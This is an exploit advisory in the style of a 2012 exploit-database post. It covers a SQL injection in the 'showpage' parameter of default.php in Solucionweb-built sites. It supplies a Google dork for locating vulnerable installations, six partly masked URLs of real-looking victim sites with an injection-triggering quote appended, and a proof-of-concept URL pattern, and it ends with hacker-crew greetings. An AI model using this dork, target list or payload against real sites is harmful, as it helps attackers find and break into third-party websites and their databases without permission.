#########################################################################
# Exploit Title: [ Solucionweb (default.php) SQL Injection Vulnerability ]
# Date: [06-11-2012]
# Author: [ShinoBi-Dz]
# E-mail : ShinoBiDz442@gmail.com
# Facebook : https://www.facebook.com/shinobi.DZz
# Category: [webapps]
# Google dork: "Powered by: Solucionweb.com" inurl:default.php?showpage=
# Tested on: [Windows 7 ]
#########################################################################
Example Sites :
http://www.broXXXXXndsolutions.com.gt/default.php?lng=&showpage=16'
http://www.asXXXXgua.com.gt/default.php?lng=&showpage=3'
http://bjinternXXXXnal.com/default.php?lng=2&showpage=5'
http://www.yXXXXgo.com/default.php?lng=2&showpage=3'
http://www.castillXXXXlen.com/default.php?lng=&showpage=20'
http://www.biXXXeris.com/web/default.php?lng=2&showpage=3'
[~]Exploit/p0c : http://www.site.com/default.php?lng=&showpage=[SQLi]
# Greet'z | Mouh Marvel-DZ | Arm4dill0-DZ | Google | Linus Benjamin | LogiCoder Man & All my friends